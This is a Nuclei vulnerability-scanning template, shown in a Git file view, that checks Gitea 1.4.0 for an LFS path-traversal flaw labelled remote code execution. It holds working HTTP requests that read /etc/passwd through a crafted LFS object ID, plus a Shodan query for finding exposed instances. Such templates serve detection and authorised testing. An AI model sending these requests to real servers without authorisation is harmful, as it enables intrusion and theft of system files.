nuclei-templates/http/vulnerabilities/gitea/gitea-rce.yaml

64 lines
1.8 KiB
YAML
Raw Normal View History

2023-03-18 22:07:09 +00:00
id: gitea-rce
info:
name: Gitea 1.4.0 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Gitea 1.4.0 is vulnerable to remote code execution.
reference:
- https://www.exploit-db.com/exploits/44996
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
2024-09-10 09:08:16 +00:00
classification:
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
2023-03-18 22:07:09 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-10-14 11:27:55 +00:00
max-request: 3
2024-09-10 08:22:50 +00:00
vendor: gitea
2024-09-10 09:08:16 +00:00
product: gitea
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
tags: gitea,rce,unauth,edb
2023-03-18 22:07:09 +00:00
http:
2023-03-18 22:07:09 +00:00
- raw:
- |
GET /api/v1/repos/search?limit=1 HTTP/1.1
Host: {{Hostname}}
- |
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/vnd.git-lfs+json
{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "{{randstr}}",
"Password" : "{{randstr}}",
"Repo" : "{{randstr}}",
"Authorization" : "{{randstr}}"
}
- |
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: word
part: header_3
words:
- "application/octet-stream"
extractors:
- type: regex
name: repo
group: 1
regex:
- '"name":".*","full_name":"(.*)","description"'
internal: true
2024-09-12 05:14:01 +00:00
# digest: 4a0a00473045022100e6535e2beccabe9f5e98a70a727d618153f63928b80da833407c6f6a93a3ceef022011ab10769dbed5f1af3b12849f603e2fd7650f2d3bf545bfbf6668bf4d88b835:922c64590222798bb761d5b6d8e72950